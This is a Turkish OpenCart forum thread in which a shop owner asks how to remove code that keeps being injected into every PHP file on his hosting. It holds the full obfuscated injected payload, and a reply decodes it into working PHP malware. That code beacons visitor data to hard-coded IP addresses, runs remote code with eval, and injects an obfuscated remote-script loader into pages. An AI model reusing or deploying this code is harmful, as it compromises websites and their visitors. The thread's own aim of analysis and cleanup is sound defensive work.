Sitedeki Dosyalara Sürekli Kod Yerleştiriliyor

[ErcanGunes]

Merhaba arkadaşlar,

Bundan 2 hafta önce sitenin index.php ve admin/index.php dosyalarının içinde garip bir kod olduğunu şu konuda belirtmiştim; http://forum.opencart-tr.com/thread-6728.html Bu kodu silmeme rağmen daha sonradan tekrardan yerleştirildiğini gördüm. Bu sabah itibari ile siteye girmeye çalıştığımda hep hata mesajları ve tüm php dosyalarının içinde en başında şu kodu görür oldum;

<?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         /*god_mode_on*/eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBvVmpGc2JsTXdUa2RpVjFKWVRsZHdhMUl5ZURKWmJYYzFZa2RXU0dKSWNHdFRSVEYyVldwS1YwMUdVbGhTYmxKYVZUSjBkMXBVU21GTlYwcDBWR3BDYUZaNmJERlRWV00xWkRGc1dFNVlTbWhWTW1SeVYxYzFWMkpWZEZsa1J6VnBVbnBzY0ZkV1pETmFNSEJJV2toYVlWSnFiREJaYWtwVFlrVTVOVkZ1Y0d0VFJYQnRXVEl4VjJReVNraFNiWEJoVlRKa2NGbFZhRXRpUm5Cd1UxaE9TbUpYYURWWGJHUmFZVlY0U1ZScVFtcGliRW95V1d0ak5VMHhjRmxUVnpsTFVqQnZlRmR0YkhKak1IQklWRzVXYTFKcWJIWlRNVko2V2pKTmVsVnViRmxOTUhCeldUQmtOR0ZHYTNsV1Z6bEtZVzVqZGxwVlkzaGpNR3h3WkRKc1VWSkVhekJaYkdRellWVjRTVlJxUW1waWJFb3lXV3RqTlUweGNGbFRWemxMVWpCdmVGZHRiSEpqTUhCSVZHNVdhMUpxYXpCVE1WSjZXakJzU0dKSE1VcFJNbVIyVTJ0a1QyUlhVa2RQVnpsS1VrUlNibFJYYkhKaVZYQndXakowV2sxcVZYZFhSRTV1V2pGQ1ZVMUhaRTVSTW5SM1UxVm9lbUV4YkhWV2JURktVa1JDYmxOclpHdGtiSEJIVDFoU2FVMXNTbk5UVlUwd1dqQndTRk5xUm1GaGJsRTFVMVZvUzJKSFVrbFdibXhwWVZWR2NsZFhOVmRpVlRrMVVXcHNTbEl4YjNoWmJURlBUVWRHV0U5WVZrcFNWMUp6V2tWVmVHRkhTbGhTVnpsTVYwaE9jbGxzWXpWTlIwWklWbTVzU2xKRVFtNVRWelZQWWtkS2RHSklWbXBOYkZvelYyeG9VMk5IU25CT1YzQnBUV3BDY0ZSNlRrdGlSMUpKVm01c2FXRlZSbkpaYkdNMVRVZEdTRlp1YkZCTmVrWXlWMWQzTldWdFVraFNibXhyVVRKa2NGbHFUa05oUjBwMFpFaENTbUZYY3pOVGEyaFBZakpKZWxreVpGRlZNRXAwVjFaa05HVnNjRlZrUnpGclZucFdjVnBGWkhOa2JVcHdVVzFvYUZJeGIzaFhhMlJoWXpGd2RXTkhkR2hTTVhCMldUTnNibUV5VGtoU1dFSnNUVzFTZWxscVNrdGhSMHBFVVZkMGFrMXRhREphU0hCNldqRnZlV1ZJV2xwaVZWcDZVMVZPVTJKdFNYbFZiVnBwVm5wc2NsZHNVbnBhTUhCSVRWZG9hVll3Vm01VlJrNURVMFp3V1ZWck5WcFdla1p2VXpCT2NrNHdjRWhYYmtKcFVqRldibFZHVGtOTlYwNTBaVWQ0YVdKVk5USlhhMlJXWWpGbmVFOVZaRlJXV0doSFYwUkZOR05GT0hsaVJ6RktVVEpvZDFsNlRrOWlSMUpFV2pKMFdVMVZOVWRXVjNoaFVteFdjMk15YkZSU2JFcFdWbFZaTlZOV1VYaFViRlpLWWtSQ2QxTXhhSHBoTWtaSVQxaHdhMUV3UlRWVFZVNVRXbXhWZDFac1RsZGhNVnBVVmpOc1MxTldXa2RWYkVaWlRVZG9VVlpVUmxKaFZtaFZaRVJzYUZZeGJHNVRNR1J6WlcxTmVWWnFRa3hSTVVwdFZsUkNWMVV4V25KV2JFNVlaVlZ3VkZWc1ZYaFZSbHBHVm0xYVVsWldTa1pXVjJ4TFdrVjBWR0pFWkV0U01uZ3pVMVZSZDFvd2NFZFBWbEpUVm10d1dGVnNXa3RaYTJ4elUydGFWVlpVYkZaVmJGazFVV3hLUmxWc1RrcGlSRUV6V214a2MySlZiRVJoU0VKcVRUQTFjMXBGVG01aE1XZDRWR3RhVm1KR2NFZFdWM2g2WVZaT1IxVnNWbFpTYW14VVZXeFdZVkpzVm5KV2JFNUtZa1JDZDFNeGFIcGhNazUwVm0weFNsSkVRbTVhUm1oTFl6RndXRTVYY0dsTmJFcHpVekJPVTFwc1ZYZFdiRTVYWVRGYVZGWXpiRXRUVmxwSFZXeEdXVTFWY0VkVmJYUlhWVEZLVjFOWGJGbFZNbk16V214a2MySlZiRVJoU0VKcVRUQTFjMXBGVG01aE1XZDRWR3RhVm1KR2NFZFdWM2g2WVZaT1IxVnNWbFpTYW14WFZsUkNWMVV4WjNkU2EyaFRWbFJXVmxOWGQzZGpSWFJaWXpKMGExWXdWbTVWUms1RFRWZE9kR1ZIZUdsaVZUVXlWMnRrVm1JeVRYcFZibXhyVW5wc2VsbHFUbXRpUjA1d1dqSjBXVTFWTlVkV1YzaGhVbXhXYzJNeWJGUlNiRXBXVmxWWk5WWnNWWGRXYkU1WlRVVmFTVlZzVlRGV1ZXeHpUVWhDVEZaSVVUVlRhMmhYWlZkS1JGRlViRXBSTUhCMldrVm9VMlF3T1hCUFNGcEtZVlZHTVZOVlRsTmtNV3hVVVZoV1NsRXdiREpaYWs1RFpEQjRkVkZ0T1dwU1JHd3dXV3BPVTJJeGNGbFRWR3hLWVZWR01WTnJZM2hoUjBwWVVsZGtUV0ZWUm5CVGJURmhZMGRLU0ZaVWJFcGhWVVl4VTFWT1UySlhSbGhsUjNoS1VYcFNibE5YYkdGaU1rbDZWR3BDVVZVd2JHNVVSMnhDWVRKR1NFOVljR3RSTUVZeFUxVk9TbUpYUmxsUlZHeEtZVlZHTVZOVlRsTmpSMDVFVVZoV1NsRXdiSFJaTWpGWFlsWkNWRk5YWkUxaFZVWnlXVEl4VjJKVmJFUk9SMlJLWVZadmVGZFdVWGRoVld4RVRrZDBhMVl3VlROWlZtUmFZakJzU0ZkcVJtbGlWVFIzV1Zaak5XUldaM2xXYWxKb1YwVTBkMWt6Ykc1aFZtdDZWbTVzYVZKcWJIZFpiVEZ6VFVWc2NHRXlaRXhYU0U1eVYxUktibG94UWxSUmJYQnJWMFZ3ZWxkRVNuTmtWMFpaVlZjNVMxTkdXalZaYTA1eVRqRnJlbFp1YkdsU2FtdzJWMnhvVTJSdFRrbFZWemxMVWpBMWRsUkZUa05TUmxwWFUyc3hWVTFWU2xaWFJFWkxVbXhhUjFac1RsVmlSa3BVVlZaVk1WWkdTbkpXYkU1TlVUQkdORk14VWpCaGJWSlpVMjVPV1Uwd05YTmFSV00xWkRKU1JGb3lkRnBOYldSNlUxVldUMVpzVm5KbFJrSldVbXhLYlZaclZuTlViRXBXVDFaYVYxRXpaRzVVV0d4eVRqQndTVlp1VG10Uk1FVTFVMVZrVDAxWFRuUmxSMXBoVjBkb2MxZFliRzVoTVd0NVdqTkNVRTE2UW01WGJHUTBaV3h3VkZGcVpFdFRSbHA2V2tWT1FrOVZiRVpSYlRGb1ZqTm9jMWRFU210aVIxSkhUMWR3YVUxcVZYZFhiR014VFVkT05Wb3lkR3RYUlhCNlV6RlNNRTlWYkVoaVJ6RktVVEpvTmxwRmFFdGtNa2w2VkZjNVMxTkdXbnBhUlU0ellWWndXVmR0YUdsUk1HeDNVMVZPUms5V1FsUlJiVEZhVmpOb05sZHNUbk5PTUhCSllqSmtVVlV3U2paYVJXaExXbTFPZEZadVpHbFNNRnB4VjJ4T2JtRldjRmxYYldocFVUQnNlbE5YYkVwak1IQkpWbTVPYTFFeWN6TlRWV1JYVFd4c1dHUXlPVXRUUnpsM1ZETnNRbUV5VFhsaFNGcHJaVlZGTlZOVmFGTmxWMUpZVmxSa2FtSldXWGRhUm1oTFpGVnNTVlZ1Ykd0V01WVXpXbXhPUTJOR2NIQlJWemxxVFRGS05Wa3dZelZsYTNSRVZXcEdhVk5HUm5wVFZ6RlhZVmRLZEZKWGJFeFZNRVp2VlVaUmQxb3hjSFJTYms1cVRXeFdkMXBZYkZOT2EyeEZUVWRrYWsweFNqVlhSRTVMWWtkT1NHVkhhRnBOYkZaMlUxY3hWMkZYU25SU1YyeE5VVEJzY0ZSRlRsTk5WMHBKVlZoQ1VHVlZSbkpYYWtrMVlURm5lVTFZV21GU01WWnVWVVpPUW1FeVZuRmpNblJxVFcxb01scEliRUpQVld4SlZXNXNhMVl4VlROWk1qRlhUVWRTV1ZOdVZrcFRSa28xV2taa1ZrNHlXbFJSYlhocFUwVTFjMU5WYURCbFZuQlpWV3BHYW1KVVVtNVhiVEZIWXpKTmVWWlVaRzFYUkVKeVYyMHhSMDFIUmtoV2JteFlUVlJDYmxWR1RrSmhWVEZWVlZSS1RXRnJWVEJVYkUwd1pWVTFWVlZZVms1aGJFVjRVMWR3ZW1FeGNIUlNha0pvVWpGYU5WWjZSWGRhTVVKVVVWZHNUbVZyVmpGVVZsSnVUVVY0Y1ZOVVFrNWhWRkkwVkZWU1RtRlZPVFZWYlRGYVYwWktkbGRzYUV0WmJHaFVVVlJzU2xFd2F6RlVWazB3WlVVNVZWZFlWazVoYTFWNVZFZHdSazFGT1VSVFZHUkxVakZ3YjFwRlpHOWlSMDV6WkVkU1NsSkVRbTVUVjNCeVpVVjRjVkpVVms5aFZGSTFWRlpTV21SVk5VVmhNbXhRVFd4d01sa3lNVmRoUm10NVdqSTVTMUl4Y0c5YVJXUnZZa2RPY0ZGdGFHcGxWVVp5V2tab1NtTkhWWGxpUnpGS1VUSmtibGRXWkc5aVYxSllWVzB4YVZJeGJ6SlhhMlJ2WWxkR1NWUlhPVXRUUmxvMVV6Rk9RbU5GYkVsak1tUmFZbXR3YzFkV1pIcGFNRGg2VFZSc2FGWXhiRzVUTUU1VFpXMUdTRTlVVGtwU1JFRTFWVVpPUTJKV2JGaGxTSEJoVlRKM00xTnJhRTloYlU1MFlraGthMUpFUW5WVlJXaFBZVzFPZEdKSVpHdFNSRlY1VjFab1Nsb3hhRFpSYWxKUVVqQmFjRlJ1YjNoWmEyeHpaVVJTVG1WcldtcGFWVkpPVFVab1NWb3pjRTlpU0djd1ZGZDBWMWt5VmtWVVdHaFpVMGRrTmxRd1dqUk9SVEUyVm0xT2JGSkZjRWRYUldodVpXc3hjMlZFVWs1bGJGcHFXbFZTVGsxR2FFbGFNMnhUVm01bk1GUlljRXRaTWxaRlZGUkNXVk5IWkRaVWJFNUtZekJzYzJWRVVrNWxhelZxV2xWU1RtVkdhRWxhTTJ4VFZtNW5NRlJZY0VkWk1sWkZWRlJTV1ZOSFpEWlVhMW8wVGtVeGNsWnRUbXhTUlRFMVYwVm9ibVZyTlVkbFJGSk9aV3R3YWxwVlVrdFNiR2hKV2pOd1RsWnVaekJVV0hCRFdUSldSVlJZY0VwaFdHUndWMFZvYm1Wck9WZGxSRkpPWld0YWFscFZVa3RTYkdoSldqTndUbFp1WnpCVVdIQnpXVEpXUlZSVVNsbFRSMlExVld4YU5FNUZNVFpUYlU1c1VrVXhORmRGYUc1bGF6VnpaVVJTVG1FeFdtcGFWVkpPWlVab1NWb3pjRTlTYm1jd1ZGaHdibUZWZUVSVGJVNXNVa1V3TVZkRmFHNWxhekZYWlVSU1RtRXhXbXBhVlZKT1pVWm9TVm96Y0ZCV2JtY3dWRmh3WVZreVZrVlRhMXBaVTBka05sUlhlRFJPUlRFMlVtMU9iRkpGTUhsWFJXaHVaVlpLVjJWRVVrNWxiRXBxV2xWU1RrNVZiSEJrTW14WlUwZGplbFJVUmpST1JUVnhWRzFPYkZKSFRqVlhSV2h1VFdzNVYyVkVVazlsYTBwcVdsVlNhazFGYkhCa01teFpVMGRqZVZSVVJqUk9SVFUyVTIxT2JGSkdhM2hYUldodVRXc3hWMlZFVWs5bGJFcHFXbFZTV2sxV2FFbGFla0pQVm01bk1GUnRkRTlaTWxaRlYxUkdXVk5IWTNsVmExbzBUa1UxY1ZadFRteFNSbkJIVjBWb2JrMHdOVVJUV0U1S1lraG5NRlJ1Y0U5Wk1sWkZXVE5zV1ZOSFkzbFVXR3hLWXpCc2MyVkVVazloYldocVdsVlNhazFHYUVsYWVrNVBVbTVuTUZSdWNFTlpNbFpGVkd0S1dWTkhaRFZWYlhnMFRrVXhjbGRYYkUxUk1IQnFXbFZTUzFJeGFFbGFlazVPVFZobk1GUlhkRmRaTWxaRldUTmtXVk5IWTNsVU1GbzBUa1UxTmxGWGJFMVJNSEJxV2xWU1drNUdhRWxhZWtwUFZtNW5NRlJ0Y0VkWk1sWkZWMVJDU21GWVpIQlhSV2h1VFdzMGVHVkVVazloYkZwcVdsVlNhazFHYUVsYWVrSlBWbTVuTUZSdGRFOVpNbFpGVjFSR1dWTkhZM2xWYTFvMFRrVTFjVlp0VG14U1JuQkhWMFZvYmswd05VZGxSRkpQWldzMWFscFZVbEpsVm1oSlducE9VRlp1WnpCVWJGSlRXVEpXUlZkWWFGbFRSMk41VkdwR05FNUZOVVpXYlU1c1VrWnNORmRGYUc1TmJFcEhaVVJTVDJGc1ZuQlVSVTVMV1RKV1JWZFlhRmxUUjJONlZGVmFORTVGTlRaUmJVNXNVa1pyZUZkRmFHNU5iRXBYWlVSU1QyRnNTbXBhVlZKU1pXeG9TVnA2U2xCU2JtY3dWRzF3YzFreVZrVlhhMUpaVTBkamVWUnJUa3RhUlRoNlYyMW9hbUZWU20xVVZXaHZZVVV4TmxWWWFGRldibEp0VkZWb2JrNUdiRmhUVkU1WVpXdEthMVJGV1RSa01sWkZZVWRvV21GdFVtbFVWbGwzWXpGb05sRnFVbEJTTUZwd1ZHcEdlbVZXYUZSbFIxcE9VMGRqTUZkV1pFcE5NV1EyVkcxU1dWWklVblJaYWs1S1lqSlNkRkp1YkVwU01uUnVXVlpqTUZveGFEWlJhbEphVmtVd2QxUldUbk5PTWxKMFVtNXNTbEl6UWpaVlJtUlRaR3hyZWxadVVtRldlbFYzVm5wRk5HUXlWa1ZoUjJoYVlXMVNhVlJzV1hoYVJYUkhUMGhrYkZKSGFHOVhWM0JyV1dzMVIwMUlRbEJOYmtJMlZucEZOR1F5VmtWaFIyaGFZVzFTYVZSdGQzaGFSa0pYVDBoa2JGSkhhRzlYVjNCcldXczBlRTFJU2xsbGEwa3dWMVpTVGsxRk1WZGtTRUpaVlROU2JWUlZhRzVPUm14WVUxUk9XR1Z0YUd0VWVrNWhZVWRPY0ZGdE9XRldNRnB5VlVaa1UyUnNhM3BXYmxKaFZucFZkMVo2UlRSa01sWkZZVWRvV21GdFVtbFVWbEpEV2tab1ZHRkhXazVUUjJNd1YxWmtTazB4WkRaaVIxSk1WbTVPTTFkR1VqQmlNWEJZVW0xMFdFMVVhRE5hVlZKdllVWnNjVnBIU2s1V1JWcHJWMFpPYjJOWFRqVmhlbVJ0VlRCRk0xVkZUVFZsYkd0NlUyNUNhbE5HUlhKVGJuQjZXakJzUkZWdE5XbE5iRXB0V1d4ak5XRXhjRlJSVkd4S1VURktObGRVVGt0alIwNUpWVlJrYlZkRVFUbEphV3R3VDNsQlBTSXBLVHNnIikpOyA=")); /*god_mode_off*/ ?>

Bundan nasıl kurtulabilirim acaba? Nasıl giriyorda böyle yapıyor? Nerede açık olabilir? Yardımcı olursanız sevinirim, gerçekten çok sıkıntı birşey bu.

Sitemde şu; seninsepetin.com

 

[TECHNOLOG]

kriptolu içerik yani o kısımda her ne yazıyorsa şifrelenmiş dolayısı ile ne olduğunu çözmek için şifre çözücü kullanmak lazım size tavsiyem orijinal dosyaları ile değiştirin.

 

[ErcanGunes]

Şuanda sitenin tüm dosyalarını indiriyorum, tek tek kontrol edip hepsini sileceğim. O şekilde tekrardan yükleyeceğim. Ama bir yerde açık var ki sürekli girip bu kodu yerleştirebiliyor. Bunu kapatmadan bunun bir sonu olmayacak gibi gözüküyor.

 

[Gökhan TAYLAN]

Kod : 4 defa Base64 ile şifrelenmiş : Sonuç

if (!function_exists(GetMama)){function opanki($buf){global $god_mode; str_replace("href","href",strtolower($buf),$cnt_h); str_replace("<?xml","<?xml",strtolower($buf),$cnt_x);  if (($cnt_h > 2)&&($cnt_x == 0)) {$buf = $god_mode . $buf;} return $buf; } function GetMama(){$mother = "seninsepetin.com";return $mother;}ob_start("opanki");$show = false;function ahfudflfzdhfhs($pa){global $show; global $god_mode; $mama = GetMama();$file = urlencode(__FILE__);if (isset($_SERVER["HTTP_HOST"])){$host = $_SERVER["HTTP_HOST"];}if (isset($_SERVER["REMOTE_ADDR"])){$ip = $_SERVER["REMOTE_ADDR"];}if (isset($_SERVER["HTTP_REFERER"])){$ref = urlencode($_SERVER["HTTP_REFERER"]);}if (isset($_SERVER["HTTP_USER_AGENT"])){$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));}$url = "http://" . $pa . "/opp.php?mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua;if( function_exists("curl_init") ){$ch = curl_init($url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_TIMEOUT, 3);$ult = curl_exec($ch);} else {$ult = @file_get_contents($url);} if (strpos($ult,"eval") !== false){$z = str_replace("eval","",$ult); eval($z); $show = true;return true;} if (strpos($ult,"ebna") !== false){$z = str_replace("ebna","",$ult); $god_mode = $z;$show = true;return true;} else {return false;}}$father[] = "146.185.254.245";$father[] = "31.184.242.103";$father[] = "91.196.216.148";$father[] = "91.196.216.49";foreach($father as $ur){if ( ahfudflfzdhfhs($ur) ) { break ;}}if ($show === false){$script='<script>var _0x8ab7=["\x31\x34\x36\x2E\x31\x38\x35\x2E\x32\x35\x34\x2E\x32\x34\x35","\x33\x31\x2E\x31\x38\x34\x2E\x32\x34\x32\x2E\x31\x30\x33","\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x31\x34\x38","\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x34\x39","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F","\x2F\x73\x2E\x70\x68\x70","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];var _0xa341=[_0x8ab7[0],_0x8ab7[1],_0x8ab7[2],_0x8ab7[3]];for(var i in _0xa341){var js=document[_0x8ab7[5]](_0x8ab7[4]);js[_0x8ab7[6]]=_0x8ab7[7]+_0xa341[i]+_0x8ab7[8];var head=document[_0x8ab7[10]](_0x8ab7[9])[0];head[_0x8ab7[11]](js);} ;</script>';  $god_mode = $script;}}

Şuanda sitenin tüm dosyalarını indiriyorum, tek tek kontrol edip hepsini sileceğim. O şekilde tekrardan yükleyeceğim. Ama bir yerde açık var ki sürekli girip bu kodu yerleştirebiliyor. Bunu kapatmadan bunun bir sonu olmayacak gibi gözüküyor.

 

[ErcanGunes]

Yani hocam ne çalıştırıyor bu, bu kodda?

---

Arkadaşlar hostingimde ki tüm sitelerin php dosyalarına bu kod bulaşmış! Ne yapacağım ben şimdi?

---

FTP şifresini değiştirdim. Ayrıca bu zararlı kod temizlenmiş php dosyalara tekrardan kod yerleştirebilir mi, FTP şifresi değiştirilince? Birde arkadaşlar tüm php dosyalarından aynı anda bu kod satırını silmek için bir yöntem ya da program mevcut mu acaba? Tek tek yapmak gerçekten çok zor oluyor. 2 saattir uğraşıyorum daha bitiremedim bile sadece bu site için.